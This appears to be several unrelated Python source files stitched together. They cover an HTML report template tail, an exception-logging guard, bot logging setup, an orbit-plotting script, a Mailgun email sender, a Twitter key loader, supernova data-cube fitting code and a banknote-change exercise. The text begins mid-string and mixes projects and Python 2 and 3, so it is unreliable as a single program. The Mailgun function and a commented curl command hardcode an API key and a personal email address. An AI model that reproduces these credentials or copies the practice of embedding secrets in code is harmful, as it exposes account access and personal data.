				background: #f4f4f4;
			}

			th {
				font-size: 12pt;
				text-align: left;
				padding: 2pt 10pt 3pt 0pt;
			}

			td {
				font-size: 10pt;
				padding: 3pt 10pt 2pt 0pt;
			}

			pre {
				font-size: 10pt;
				background: #f4f4f4;
				padding: 5pt;
			}

			a {
				text-decoration: none;
				color: #04a;
			}

			.running {
				color: #08b;
			}

			.finished {
				color: #390;
			}

			.comment {
				min-width: 200pt;
				font-style: italic;
			}

			.progress {
				color: #ccc;
			}

			.progress .bars {
				color: black;
			}
		</style>
	</head>
	<body>'''

HTML_FOOTER = '''
	</body>
</html>'''



if __name__ == '__main__':
	sys.exit(main(sys.argv))

import traceback


class EnsureExceptionHandledGuard:
    """Helper for ensuring that Future's exceptions were handled.

    This solves a nasty problem with Futures and Tasks that have an
    exception set: if nobody asks for the exception, the exception is
    never logged.  This violates the Zen of Python: 'Errors should
    never pass silently.  Unless explicitly silenced.'

    However, we don't want to log the exception as soon as
    set_exception() is called: if the calling code is written
    properly, it will get the exception and handle it properly.  But
    we *do* want to log it if result() or exception() was never called
    -- otherwise developers waste a lot of time wondering why their
    buggy code fails silently.

    An earlier attempt added a __del__() method to the Future class
    itself, but this backfired because the presence of __del__()
    prevents garbage collection from breaking cycles.  A way out of
    this catch-22 is to avoid having a __del__() method on the Future
    class itself, but instead to have a reference to a helper object
    with a __del__() method that logs the traceback, where we ensure
    that the helper object doesn't participate in cycles, and only the
    Future has a reference to it.

    The helper object is added when set_exception() is called.  When
    the Future is collected, and the helper is present, the helper
    object is also collected, and its __del__() method will log the
    traceback.  When the Future's result() or exception() method is
    called (and a helper object is present), it removes the the helper
    object, after calling its clear() method to prevent it from
    logging.

    One downside is that we do a fair amount of work to extract the
    traceback from the exception, even when it is never logged.  It
    would seem cheaper to just store the exception object, but that
    references the traceback, which references stack frames, which may
    reference the Future, which references the _EnsureExceptionHandledGuard,
    and then the _EnsureExceptionHandledGuard would be included in a cycle,
    which is what we're trying to avoid! As an optimization, we don't
    immediately format the exception; we only do the work when
    activate() is called, which call is delayed until after all the
    Future's callbacks have run.  Since usually a Future has at least
    one callback (typically set by 'yield from') and usually that
    callback extracts the callback, thereby removing the need to
    format the exception.

    PS. I don't claim credit for this solution.  I first heard of it
    in a discussion about closing files when they are collected.
    """

    __slots__ = ['exc', 'tb', 'hndl', 'cls']

    def __init__(self, exc, handler):
        self.exc = exc
        self.hndl = handler
        self.cls = type(exc)
        self.tb = None

    def activate(self):
        exc = self.exc
        if exc is not None:
            self.exc = None
            self.tb = traceback.format_exception(exc.__class__, exc,
                                                 exc.__traceback__)

    def clear(self):
        self.exc = None
        self.tb = None

    def __del__(self):
        if self.tb:
            self.hndl(self.cls, self.tb)

__package__ = 'archivebox.core'

import logging.handlers
import os

_pabotlog = logging.getLogger('PABot')

_pabotlog.setLevel(logging.DEBUG)

_logPath = os.path.abspath("./logging/pabot.log")

_formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(name)s - %(message)s')

_consoleStreamHandler = logging.StreamHandler()
_consoleStreamHandler.setLevel(logging.DEBUG)
_consoleStreamHandler.setFormatter(_formatter)

_symLogRotFileHandler = logging.handlers.RotatingFileHandler(_logPath, maxBytes=2000000, backupCount=5)
_symLogRotFileHandler.setLevel(logging.DEBUG)
_symLogRotFileHandler.setFormatter(_formatter)

_pabotlog.addHandler(_consoleStreamHandler)
_pabotlog.addHandler(_symLogRotFileHandler)


def LogPABotMessage(message):
    _pabotlog.info(message)


def LogPABotError(message):
    _pabotlog.error(message)

import ast
import heisenberg.library.heisenberg_dynamics_context
import heisenberg.library.orbit_plot
import heisenberg.option_parser
import heisenberg.plot
import heisenberg.util
import matplotlib
import numpy as np
import sys

# https://github.com/matplotlib/matplotlib/issues/5907 says this should fix "Exceeded cell block limit" problems
matplotlib.rcParams['agg.path.chunksize'] = 10000

dynamics_context = heisenberg.library.heisenberg_dynamics_context.Numeric()

op = heisenberg.option_parser.OptionParser(module=heisenberg.plot)
# Add the subprogram-specific options here.
op.add_option(
    '--initial-preimage',
    dest='initial_preimage',
    type='string',
    help='Specifies the preimage of the initial conditions with respect to the embedding map specified by the --embedding-dimension and --embedding-solution-sheet-index option values.  Should have the form [x_1,...,x_n], where n is the embedding dimension and x_i is a floating point literal for each i.'
)
op.add_option(
    '--initial',
    dest='initial',
    type='string',
    help='Specifies the initial conditions [x,y,z,p_x,p_y,p_z], where each of x,y,z,p_x,p_y,p_z are floating point literals.'
)
op.add_option(
    '--optimization-iterations',
    dest='optimization_iterations',
    default=1000,
    type='int',
    help='Specifies the number of iterations to run the optimization for (if applicable).  Default is 1000.'
)
op.add_option(
    '--optimize-initial',
    dest='optimize_initial',
    action='store_true',
    default=False,
    help='Indicates that the specified initial condition (via whichever of the --initial... options) should be used as the starting point for an optimization to attempt to close the orbit.  Default value is False.'
)
op.add_option(
    '--output-dir',
    dest='output_dir',
    default='.',
    help='Specifies the directory to write plot images and data files to.  Default is current directory.'
)
op.add_option(
    '--disable-plot-initial',
    dest='disable_plot_initial',
    action='store_true',
    default=False,
    help='Disables plotting the initial curve; only has effect if --optimize-initial is specified.'
)

options,args = op.parse_argv_and_validate()
if options is None:
    sys.exit(-1)

num_initial_conditions_specified = sum([
    options.initial_preimage is not None,
    options.initial is not None,
])
if num_initial_conditions_specified != 1:
    print('Some initial condition option must be specified; --initial-preimage, --initial.  However, {0} of those were specified.'.format(num_initial_conditions_specified))
    op.print_help()
    sys.exit(-1)

# Validate subprogram-specific options here.

# Attempt to parse initial conditions.  Upon success, the attribute options.qp_0 should exist.
if options.initial_preimage is not None:
    try:
        options.initial_preimage = np.array(ast.literal_eval(options.initial_preimage))
        expected_shape = (options.embedding_dimension,)
        if options.initial_preimage.shape != expected_shape:
            raise ValueError('--initial-preimage value had the wrong number of components (got {0} but expected {1}).'.format(options.initial_preimage.shape, expected_shape))
        options.qp_0 = dynamics_context.embedding(N=options.embedding_dimension, sheet_index=options.embedding_solution_sheet_index)(options.initial_preimage)
    except Exception as e:
        print('error parsing --initial-preimage value; error was {0}'.format(e))
        op.print_help()
        sys.exit(-1)
elif options.initial is not None:
    try:
        options.initial = heisenberg.util.csv_as_ndarray(heisenberg.util.pop_brackets_off_of(options.initial), float)
        expected_shape = (6,)
        if options.initial.shape != expected_shape:
            raise ValueError('--initial value had the wrong number of components (got {0} but expected {1}).'.format(options.initial.shape, expected_shape))
        options.qp_0 = options.initial.reshape(2,3)
    except ValueError as e:
        print('error parsing --initial value: {0}'.format(str(e)))
        op.print_help()
        sys.exit(-1)
else:
    assert False, 'this should never happen because of the check with num_initial_conditions_specified'

rng = np.random.RandomState(options.seed)
heisenberg.plot.plot(dynamics_context, options, rng=rng)

def send_simple_message():
    return requests.post(
        "https://api.mailgun.net/v3/sandbox049ff464a4d54974bb0143935f9577ef.mailgun.org/messages",
        auth=("api", "key-679dc79b890e700f11f001a6bf86f4a1"),
        data={"from": "Mailgun Sandbox <postmaster@sandbox049ff464a4d54974bb0143935f9577ef.mailgun.org>",
              "to": "nick <nicorellius@gmail.com>",
              "subject": "Hello nick",
              "text": "Congratulations nick, you just sent an email with Mailgun!  You are truly awesome!  You can see a record of this email in your logs: https://mailgun.com/cp/log .  You can send up to 300 emails/day from this sandbox server.  Next, you should add your own domain so you can send 10,000 emails/month for free."})


# cURL command to send mail aith API key
# curl -s --user 'api:key-679dc79b890e700f11f001a6bf86f4a1' \
#     https://api.mailgun.net/v3/mail.pdxpixel.com/messages \
#     -F from='Excited User <mailgun@pdxpixel.com>' \
#     -F to=nick@pdxpixel.com \
#     -F subject='Hello' \
#     -F text='Testing some Mailgun awesomness!'

def load_keys(filepath):
    """
    Loads the Twitter API keys into a dict.
    :param filepath: file path to config file with Twitter API keys.
    :return: keys_dict
    :raise: IOError
    """
    try:
        keys_file = open(filepath, 'rb')
        keys = {}
        for line in keys_file:
            key, value = line.split('=')
            keys[key.strip()] = value.strip()
    except IOError:
        message = ('File {} cannot be opened.'
                   ' Check that it exists and is binary.')
        print message.format(filepath)
        raise
    except:
        print "Error opening or unpickling file."
        raise
    return keys

"""Main entry points for scripts."""

from __future__ import print_function, division

from argparse import ArgumentParser
from collections import OrderedDict
from copy import copy
from datetime import datetime
import glob
import json
import logging
import math
import os

import scipy.stats
import numpy as np

from .version import __version__
from .psffuncs import gaussian_moffat_psf
from .psf import TabularPSF, GaussianMoffatPSF
from .io import read_datacube, write_results, read_results
from .fitting import (guess_sky, fit_galaxy_single, fit_galaxy_sky_multi,
                      fit_position_sky, fit_position_sky_sn_multi,
                      RegularizationPenalty)
from .utils import yxbounds
from .extern import ADR, Hyper_PSF3D_PL


__all__ = ["cubefit", "cubefit_subtract", "cubefit_plot"]

MODEL_SHAPE = (32, 32)
SPAXEL_SIZE = 0.43
MIN_NMAD = 2.5  # Minimum Number of Median Absolute Deviations above
                # the minimum spaxel value in fit_position
LBFGSB_FACTOR = 1e10
REFWAVE = 5000.  # reference wavelength in Angstroms for PSF params and ADR
POSITION_BOUND = 3.  # Bound on fitted positions relative in initial positions

def snfpsf(wave, psfparams, header, psftype):
    """Create a 3-d PSF based on SNFactory-specific parameterization of
    Gaussian + Moffat PSF parameters and ADR."""

    # Get Gaussian+Moffat parameters at each wavelength.
    relwave = wave / REFWAVE - 1.0
    ellipticity = abs(psfparams[0]) * np.ones_like(wave)
    alpha = np.abs(psfparams[1] +
                   psfparams[2] * relwave +
                   psfparams[3] * relwave**2)

    # correlated parameters (coefficients determined externally)
    sigma = 0.545 + 0.215 * alpha  # Gaussian parameter
    beta  = 1.685 + 0.345 * alpha  # Moffat parameter
    eta   = 1.040 + 0.0   * alpha  # gaussian ampl. / moffat ampl.

    # Atmospheric differential refraction (ADR): Because of ADR,
    # the center of the PSF will be different at each wavelength,
    # by an amount that we can determine (pretty well) from the
    # atmospheric conditions and the pointing and angle of the
    # instrument. We calculate the offsets here as a function of
    # observation and wavelength and input these to the model.

    # Correction to parallactic angle and airmass for 2nd-order effects
    # such as MLA rotation, mechanical flexures or finite-exposure
    # corrections. These values have been trained on faint-std star
    # exposures.
    #
    # `predict_adr_params` uses 'AIRMASS', 'PARANG' and 'CHANNEL' keys
    # in input dictionary.
    delta, theta = Hyper_PSF3D_PL.predict_adr_params(header)

    # check for crazy values of pressure and temperature, and assign default
    # values.
    pressure = header.get('PRESSURE', 617.)
    if not 550. < pressure < 650.:
        pressure = 617.
    temp = header.get('TEMP', 2.)
    if not -20. < temp < 20.:
        temp = 2.

    adr = ADR(pressure, temp, lref=REFWAVE, delta=delta, theta=theta)
    adr_refract = adr.refract(0, 0, wave, unit=SPAXEL_SIZE)
        
    # adr_refract[0, :] corresponds to x, adr_refract[1, :] => y
    xctr, yctr = adr_refract

    if psftype == 'gaussian-moffat':
        return GaussianMoffatPSF(sigma, alpha, beta, ellipticity, eta,
                                 yctr, xctr, MODEL_SHAPE, subpix=3)

    elif psftype == 'tabular':
        A = gaussian_moffat_psf(sigma, alpha, beta, ellipticity, eta,
                                yctr, xctr, MODEL_SHAPE, subpix=3)
        return TabularPSF(A)
    else:
        raise ValueError("unknown psf type: " + repr(psftype))


def setup_logging(loglevel, logfname=None):

    # if loglevel isn't an integer, parse it as "debug", "info", etc:
    if not isinstance(loglevel, int):
        loglevel = getattr(logging, loglevel.upper(), None)
    if not isinstance(loglevel, int):
        print('Invalid log level: %s' % loglevel)
        exit(1)

    # remove logfile if it already exists
    if logfname is not None and os.path.exists(logfname):
        os.remove(logfname)

    logging.basicConfig(filename=logfname, format="%(levelname)s %(message)s",
                        level=loglevel)


def cubefit(argv=None):

    DESCRIPTION = "Fit SN + galaxy model to SNFactory data cubes."

    parser = ArgumentParser(prog="cubefit", description=DESCRIPTION)
    parser.add_argument("configfile",
                        help="configuration file name (JSON format)")
    parser.add_argument("outfile", help="Output file name (FITS format)")
    parser.add_argument("--dataprefix", default="",
                        help="path prepended to data file names; default is "
                        "empty string")
    parser.add_argument("--logfile", help="Write log to this file "
                        "(default: print to stdout)", default=None)
    parser.add_argument("--loglevel", default="info",
                        help="one of: debug, info, warning (default is info)")
    parser.add_argument("--diagdir", default=None,
                        help="If given, write intermediate diagnostic results "
                        "to this directory")
    parser.add_argument("--refitgal", default=False, action="store_true",
                        help="Add an iteration where galaxy model is fit "
                        "using all epochs and then data/SN positions are "
                        "refit")
    parser.add_argument("--mu_wave", default=0.07, type=float,
                        help="Wavelength regularization parameter. "
                        "Default is 0.07.")
    parser.add_argument("--mu_xy", default=0.001, type=float,
                        help="Spatial regularization parameter. "
                        "Default is 0.001.")
    parser.add_argument("--psftype", default="gaussian-moffat",
                        help="Type of PSF: 'gaussian-moffat' or 'tabular'. "
                        "Currently, tabular means generate a tabular PSF from "
                        "gaussian-moffat parameters.")
    args = parser.parse_args(argv)

    setup_logging(args.loglevel, logfname=args.logfile)

    # record start time
    tstart = datetime.now()
    logging.info("cubefit v%s started at %s", __version__,
                 tstart.strftime("%Y-%m-%d %H:%M:%S"))
    tsteps = OrderedDict()  # finish time of each step.

    logging.info("parameters: mu_wave={:.3g} mu_xy={:.3g} refitgal={}"
                 .format(args.mu_wave, args.mu_xy, args.refitgal))
    logging.info("            psftype={}".format(args.psftype))

    logging.info("reading config file")
    with open(args.configfile) as f:
        cfg = json.load(f)

    # basic checks on config contents.
    assert (len(cfg["filenames"]) == len(cfg["xcenters"]) ==
            len(cfg["ycenters"]) == len(cfg["psf_params"]))

    # -------------------------------------------------------------------------
    # Load data cubes from the list of FITS files.

    nt = len(cfg["filenames"])

    logging.info("reading %d data cubes", nt)
    cubes = []
    for fname in cfg["filenames"]:
        logging.debug("  reading %s", fname)
        cubes.append(read_datacube(os.path.join(args.dataprefix, fname)))
    wave = cubes[0].wave
    nw = len(wave)

    # assign some local variables for convenience
    refs = cfg["refs"]
    master_ref = cfg["master_ref"]
    if master_ref not in refs:
        raise ValueError("master ref choice must be one of the final refs (" +
                         " ".join(refs.astype(str)) + ")")
    nonmaster_refs = [i for i in refs if i != master_ref]
    nonrefs = [i for i in range(nt) if i not in refs]

    # Ensure that all cubes have the same wavelengths.
    if not all(np.all(cubes[i].wave == wave) for i in range(1, nt)):
        raise ValueError("all data must have same wavelengths")

    # -------------------------------------------------------------------------
    # PSF for each observation

    logging.info("setting up PSF for all %d epochs", nt)
    psfs = [snfpsf(wave, cfg["psf_params"][i], cubes[i].header, args.psftype)
            for i in range(nt)]

    # -------------------------------------------------------------------------
    # Initialize all model parameters to be fit

    yctr0 = np.array(cfg["ycenters"])
    xctr0 = np.array(cfg["xcenters"])

    galaxy = np.zeros((nw, MODEL_SHAPE[0], MODEL_SHAPE[1]), dtype=np.float64)
    sn = np.zeros((nt, nw), dtype=np.float64)  # SN spectrum at each epoch
    skys = np.zeros((nt, nw), dtype=np.float64)  # Sky spectrum at each epoch
    yctr = yctr0.copy()
    xctr = xctr0.copy()
    snctr = (0., 0.)

    # For writing out to FITS
    modelwcs = {"CRVAL1": -SPAXEL_SIZE * (MODEL_SHAPE[0] - 1) / 2.,
                "CRPIX1": 1,
                "CDELT1": SPAXEL_SIZE,
                "CRVAL2": -SPAXEL_SIZE * (MODEL_SHAPE[1] - 1) / 2.,
                "CRPIX2": 1,
                "CDELT2": SPAXEL_SIZE,
                "CRVAL3": cubes[0].header["CRVAL3"],
                "CRPIX3": cubes[0].header["CRPIX3"],
                "CDELT3": cubes[0].header["CDELT3"]}

    # -------------------------------------------------------------------------
    # Position bounds

    # Bounds on data position: shape=(nt, 2)
    xctrbounds = np.vstack((xctr - POSITION_BOUND, xctr + POSITION_BOUND)).T
    yctrbounds = np.vstack((yctr - POSITION_BOUND, yctr + POSITION_BOUND)).T
    snctrbounds = (-POSITION_BOUND, POSITION_BOUND)

    # For data positions, check that bounds do not extend
    # past the edge of the model and adjust the minbound and maxbound.
    # This doesn't apply to SN position.
    gshape = galaxy.shape[1:3]  # model shape
    for i in range(nt):
        dshape = cubes[i].data.shape[1:3]
        (yminabs, ymaxabs), (xminabs, xmaxabs) = yxbounds(gshape, dshape)
        yctrbounds[i, 0] = max(yctrbounds[i, 0], yminabs)
        yctrbounds[i, 1] = min(yctrbounds[i, 1], ymaxabs)
        xctrbounds[i, 0] = max(xctrbounds[i, 0], xminabs)
        xctrbounds[i, 1] = min(xctrbounds[i, 1], xmaxabs)

    # -------------------------------------------------------------------------
    # Guess sky

    logging.info("guessing sky for all %d epochs", nt)
    for i, cube in enumerate(cubes):
        skys[i, :] = guess_sky(cube, npix=30)

    # -------------------------------------------------------------------------
    # Regularization penalty parameters

    # Calculate rough average galaxy spectrum from all final refs.
    spectra = np.zeros((len(refs), len(wave)), dtype=np.float64)
    for j, i in enumerate(refs):
        avg_spec = np.average(cubes[i].data, axis=(1, 2)) - skys[i]
        mean_spec, bins, bn = scipy.stats.binned_statistic(wave, avg_spec, 
                                                           bins=len(wave)/10)
        spectra[j] = np.interp(wave, bins[:-1] + np.diff(bins)[0]/2., 
                               mean_spec)
    mean_gal_spec = np.average(spectra, axis=0)
    # Ensure that there won't be any negative or tiny values in mean:
    mean_floor = 0.1 * np.median(mean_gal_spec)
    mean_gal_spec[mean_gal_spec < mean_floor] = mean_floor

    galprior = np.zeros((nw, MODEL_SHAPE[0], MODEL_SHAPE[1]), dtype=np.float64)

    regpenalty = RegularizationPenalty(galprior, mean_gal_spec, args.mu_xy,
                                       args.mu_wave)

    tsteps["setup"] = datetime.now()

    # -------------------------------------------------------------------------
    # Fit just the galaxy model to just the master ref.

    data = cubes[master_ref].data - skys[master_ref, :, None, None]
    weight = cubes[master_ref].weight

    logging.info("fitting galaxy to master ref [%d]", master_ref)
    galaxy = fit_galaxy_single(galaxy, data, weight,
                               (yctr[master_ref], xctr[master_ref]),
                               psfs[master_ref], regpenalty, LBFGSB_FACTOR)

    if args.diagdir:
        fname = os.path.join(args.diagdir, 'step1.fits')
        write_results(galaxy, skys, sn, snctr, yctr, xctr, yctr0, xctr0,
                      yctrbounds, xctrbounds, cubes, psfs, modelwcs, fname)

    tsteps["fit galaxy to master ref"] = datetime.now()

    # -------------------------------------------------------------------------
    # Fit the positions of the other final refs
    #
    # Here we only use spaxels where the *model* has significant flux.
    # We define "significant" as some number of median absolute deviations
    # (MAD) above the minimum flux in the model. We (temporarily) set the
    # weight of "insignificant" spaxels to zero during this process, then
    # restore the original weight after we're done.
    #
    # If there are less than 20 "significant" spaxels, we do not attempt to
    # fit the position, but simply leave it as is.

    logging.info("fitting position of non-master refs %s", nonmaster_refs)
    for i in nonmaster_refs:
        cube = cubes[i]

        # Evaluate galaxy on this epoch for purpose of masking spaxels.
        gal = psfs[i].evaluate_galaxy(galaxy, (cube.ny, cube.nx),
                                      (yctr[i], xctr[i]))

        # Set weight of low-valued spaxels to zero.
        gal2d = gal.sum(axis=0)  # Sum of gal over wavelengths
        mad = np.median(np.abs(gal2d - np.median(gal2d)))
        mask = gal2d > np.min(gal2d) + MIN_NMAD * mad
        if mask.sum() < 20:
            continue

        weight = cube.weight * mask[None, :, :]

        fctr, fsky = fit_position_sky(galaxy, cube.data, weight,
                                      (yctr[i], xctr[i]), psfs[i],
                                      (yctrbounds[i], xctrbounds[i]))
        yctr[i], xctr[i] = fctr
        skys[i, :] = fsky

    tsteps["fit positions of other refs"] = datetime.now()

    # -------------------------------------------------------------------------
    # Redo model fit, this time including all final refs.

    datas = [cubes[i].data for i in refs]
    weights = [cubes[i].weight for i in refs]
    ctrs = [(yctr[i], xctr[i]) for i in refs]
    psfs_refs = [psfs[i] for i in refs]
    logging.info("fitting galaxy to all refs %s", refs)
    galaxy, fskys = fit_galaxy_sky_multi(galaxy, datas, weights, ctrs,
                                         psfs_refs, regpenalty, LBFGSB_FACTOR)

    # put fitted skys back in `skys`
    for i,j in enumerate(refs):
        skys[j, :] = fskys[i]

    if args.diagdir:
        fname = os.path.join(args.diagdir, 'step2.fits')
        write_results(galaxy, skys, sn, snctr, yctr, xctr, yctr0, xctr0,
                      yctrbounds, xctrbounds, cubes, psfs, modelwcs, fname)

    tsteps["fit galaxy to all refs"] = datetime.now()

    # -------------------------------------------------------------------------
    # Fit position of data and SN in non-references
    #
    # Now we think we have a good galaxy model. We fix this and fit
    # the relative position of the remaining epochs (which presumably
    # all have some SN light). We simultaneously fit the position of
    # the SN itself.

    logging.info("fitting position of all %d non-refs and SN position",
                 len(nonrefs))
    if len(nonrefs) > 0:
        datas = [cubes[i].data for i in nonrefs]
        weights = [cubes[i].weight for i in nonrefs]
        psfs_nonrefs = [psfs[i] for i in nonrefs]
        fyctr, fxctr, snctr, fskys, fsne = fit_position_sky_sn_multi(
            galaxy, datas, weights, yctr[nonrefs], xctr[nonrefs],
            snctr, psfs_nonrefs, LBFGSB_FACTOR, yctrbounds[nonrefs],
            xctrbounds[nonrefs], snctrbounds)

        # put fitted results back in parameter lists.
        yctr[nonrefs] = fyctr
        xctr[nonrefs] = fxctr
        for i,j in enumerate(nonrefs):
            skys[j, :] = fskys[i]
            sn[j, :] = fsne[i]

    tsteps["fit positions of nonrefs & SN"] = datetime.now()

    # -------------------------------------------------------------------------
    # optional step(s)

    if args.refitgal and len(nonrefs) > 0:

        if args.diagdir:
            fname = os.path.join(args.diagdir, 'step3.fits')
            write_results(galaxy, skys, sn, snctr, yctr, xctr, yctr0, xctr0,
                          yctrbounds, xctrbounds, cubes, psfs, modelwcs, fname)

        # ---------------------------------------------------------------------
        # Redo fit of galaxy, using ALL epochs, including ones with SN
        # light.  We hold the SN "fixed" simply by subtracting it from the
        # data and fitting the remainder.
        #
        # This is slightly dangerous: any errors in the original SN
        # determination, whether due to an incorrect PSF or ADR model
        # or errors in the galaxy model will result in residuals. The
        # galaxy model will then try to compensate for these.
        #
        # We should look at the galaxy model at the position of the SN
        # before and after this step to see if there is a bias towards
        # the galaxy flux increasing.

        logging.info("fitting galaxy using all %d epochs", nt)
        datas = [cube.data for cube in cubes]
        weights = [cube.weight for cube in cubes]
        ctrs = [(yctr[i], xctr[i]) for i in range(nt)]

        # subtract SN from non-ref cubes.
        for i in nonrefs:
            s = psfs[i].point_source(snctr, datas[i].shape[1:3], ctrs[i])
            # do *not* use in-place operation (-=) here!
            datas[i] = cubes[i].data - sn[i, :, None, None] * s

        galaxy, fskys = fit_galaxy_sky_multi(galaxy, datas, weights, ctrs,
                                             psfs, regpenalty, LBFGSB_FACTOR)
        for i in range(nt):
            skys[i, :] = fskys[i]  # put fitted skys back in skys

        if args.diagdir:
            fname = os.path.join(args.diagdir, 'step4.fits')
            write_results(galaxy, skys, sn, snctr, yctr, xctr, yctr0, xctr0,
                          yctrbounds, xctrbounds, cubes, psfs, modelwcs, fname)

        # ---------------------------------------------------------------------
        # Repeat step before last: fit position of data and SN in
        # non-references

        logging.info("re-fitting position of all %d non-refs and SN position",
                     len(nonrefs))
        if len(nonrefs) > 0:
            datas = [cubes[i].data for i in nonrefs]
            weights = [cubes[i].weight for i in nonrefs]
            psfs_nonrefs = [psfs[i] for i in nonrefs]
            fyctr, fxctr, snctr, fskys, fsne = fit_position_sky_sn_multi(
                galaxy, datas, weights, yctr[nonrefs], xctr[nonrefs],
                snctr, psfs_nonrefs, LBFGSB_FACTOR, yctrbounds[nonrefs],
                xctrbounds[nonrefs], snctrbounds)

            # put fitted results back in parameter lists.
            yctr[nonrefs] = fyctr
            xctr[nonrefs] = fxctr
            for i, j in enumerate(nonrefs):
                skys[j, :] = fskys[i]
                sn[j, :] = fsne[i]

    # -------------------------------------------------------------------------
    # Write results

    logging.info("writing results to %s", args.outfile)
    write_results(galaxy, skys, sn, snctr, yctr, xctr, yctr0, xctr0,
                  yctrbounds, xctrbounds, cubes, psfs, modelwcs, args.outfile)

    # time info
    logging.info("step times:")
    maxlen = max(len(key) for key in tsteps)
    fmtstr = "        %2dm%02ds - %-" + str(maxlen) + "s"
    tprev = tstart
    for key, tstep in tsteps.items():
        t = (tstep - tprev).seconds
        logging.info(fmtstr, t//60, t%60, key)
        tprev = tstep

    tfinish = datetime.now()
    logging.info("finished at %s", tfinish.strftime("%Y-%m-%d %H:%M:%S"))
    t = (tfinish - tstart).seconds
    logging.info("took %3dm%2ds", t // 60, t % 60)

    return 0


def cubefit_subtract(argv=None):
    DESCRIPTION = \
"""Subtract model determined by cubefit from the original data.

The "outnames" key in the supplied configuration file is used to
determine the output FITS file names. The input FITS header is passed
unaltered to the output file, with the following additions:
(1) A `HISTORY` entry. (2) `CBFT_SNX` and `CBFT_SNY` records giving
the cubefit-determined position of the SN relative to the center of
the data array (at the reference wavelength).

This script also writes fitted SN spectra to individual FITS files.
The "sn_outnames" configuration field determines the output filenames.
"""

    import shutil

    import fitsio

    prog_name = "cubefit-subtract"
    prog_name_ver = "{} v{}".format(prog_name, __version__)
    parser = ArgumentParser(prog=prog_name, description=DESCRIPTION)
    parser.add_argument("configfile", help="configuration file name "
                        "(JSON format), same as cubefit input.")
    parser.add_argument("resultfile", help="Result FITS file from cubefit")
    parser.add_argument("--dataprefix", default="",
                        help="path prepended to data file names; default is "
                        "empty string")
    parser.add_argument("--outprefix", default="",
                        help="path prepended to output file names; default is "
                        "empty string")
    args = parser.parse_args(argv)

    setup_logging("info")

    # get input & output filenames
    with open(args.configfile) as f:
        cfg = json.load(f)
    fnames = [os.path.join(args.dataprefix, fname)
              for fname in cfg["filenames"]]
    outfnames = [os.path.join(args.outprefix, fname)
                 for fname in cfg["outnames"]]

    # load results
    results = read_results(args.resultfile)
    epochs = results["epochs"]
    sny, snx = results["snctr"]
    if not len(epochs) == len(fnames) == len(outfnames):
        raise RuntimeError("number of epochs in result file not equal to "
                           "number of input and output files in config file")

    # subtract and write out.
    for fname, outfname, epoch in zip(fnames, outfnames, epochs):
        logging.info("writing %s", outfname)
        shutil.copy(fname, outfname)
        f = fitsio.FITS(outfname, "rw")
        data = f[0].read()
        data -= epoch["galeval"]
        f[0].write(data)
        f[0].write_history("galaxy subtracted by " + prog_name_ver)
        f[0].write_key("CBFT_SNX", snx - epoch['xctr'],
                       comment="SN x offset from center at {:.0f} A [spaxels]"
                       .format(REFWAVE))
        f[0].write_key("CBFT_SNY", sny - epoch['yctr'],
                       comment="SN y offset from center at {:.0f} A [spaxels]"
                       .format(REFWAVE))
        f.close()

    # output SN spectra to separate files.
    sn_outnames = [os.path.join(args.outprefix, fname)
                   for fname in cfg["sn_outnames"]]
    header = {"CRVAL1": results["header"]["CRVAL3"],
              "CRPIX1": results["header"]["CRPIX3"],
              "CDELT1": results["header"]["CDELT3"]}
    for outfname, epoch in zip(sn_outnames, epochs):
        logging.info("writing %s", outfname)
        if os.path.exists(outfname):  # avoid warning from clobber=True
            os.remove(outfname)
        with fitsio.FITS(outfname, "rw") as f:
            f.write(epoch["sn"], extname="sn", header=header)
            f[0].write_history("created by " + prog_name_ver)

    return 0


def cubefit_plot(argv=None):
    DESCRIPTION = """Plot results and diagnostics from cubefit"""

    from .plotting import plot_timeseries, plot_epoch, plot_sn, plot_adr

    # arguments are the same as cubefit except an output 
    parser = ArgumentParser(prog="cubefit-plot", description=DESCRIPTION)
    parser.add_argument("configfile", help="configuration filename")
    parser.add_argument("resultfile", help="Result filename from cubefit")
    parser.add_argument("outprefix", help="output prefix")
    parser.add_argument("--dataprefix", default="",
                        help="path prepended to data file names; default is "
                        "empty string")
    parser.add_argument('-b', '--band', help='timeseries band (U, B, V). '
                        'Default is a 1000 A wide band in middle of cube.',
                        default=None, dest='band')
    parser.add_argument('--idrfiles', nargs='+', default=None,
                        help='Prefix of IDR. If given, the cubefit SN '
                        'spectra are plotted against the production values.')
    parser.add_argument("--diagdir", default=None,
                        help="If given, read intermediate diagnostic "
                        "results from this directory and include in plot(s)")
    parser.add_argument("--plotepochs", default=False, action="store_true",
                        help="Make diagnostic plots for each epoch")
    args = parser.parse_args(argv)

    # Read in data
    with open(args.configfile) as f:
        cfg = json.load(f)
    cubes = [read_datacube(os.path.join(args.dataprefix, fname), scale=False)
             for fname in cfg["filenames"]]

    results = OrderedDict()

    # Diagnostic results at each step
    if args.diagdir is not None:
        fnames = sorted(glob.glob(os.path.join(args.diagdir, "step*.fits")))
        for fname in fnames:
            name = os.path.basename(fname).split(".")[0]
            results[name] = read_results(fname)

    # Final result (don't fail if not available)
    if os.path.exists(args.resultfile):
        results["final"] = read_results(args.resultfile)

    # plot time series
    plot_timeseries(cubes, results, band=args.band,
                    fname=(args.outprefix + '_timeseries.png'))

    # Plot wave slices and sn, galaxy and sky spectra for all epochs.
    if 'final' in results and args.plotepochs:
        for i_t in range(len(cubes)):
            plot_epoch(cubes[i_t], results['final']['epochs'][i_t],
                       fname=(args.outprefix + '_epoch%02d.png' % i_t))

    # Plot result spectra against IDR spectra.
    if 'final' in results and args.idrfiles is not None:
        plot_sn(cfg['filenames'], results['final']['epochs']['sn'],
                results['final']['wave'], args.idrfiles,
                args.outprefix + '_sn.png')

    # Plot the x-y coordinates of the adr versus wavelength
    # (Skip this for now; contains no interesting information)
    #plot_adr(cubes, cubes[0].wave, fname=(args.outprefix + '_adr.png'))

    return 0

# -*- coding: utf-8 -*-


def calc_note(count, value):
    qnt = 0
    if count >= value:
        qnt = int(count) / value
    print '%d nota(s) de R$ %d.00' % (qnt, value)
    return count - qnt * value


n = float(raw_input())

print 'NOTAS:'
n = calc_note(n, 100)
n = calc_note(n, 50)
n = calc_note(n, 20)
n = calc_note(n, 10)
n = calc_note(n, 5)
n = calc_note(n, 2)
print 'MOEDAS:'
print '%d moeda(s) de R$ 1.00' % int(n)
n -= int(n)
m50 = n / 0.50
print '%d moeda(s) de R$ 0.50' % m50
n -= int(m50) * 0.50
m25 = n / 0.25
print '%d moeda(s) de R$ 0.25' % m25
n -= int(m25) * 0.25
m10 = n / 0.10
print '%d moeda(s) de R$ 0.10' % m10
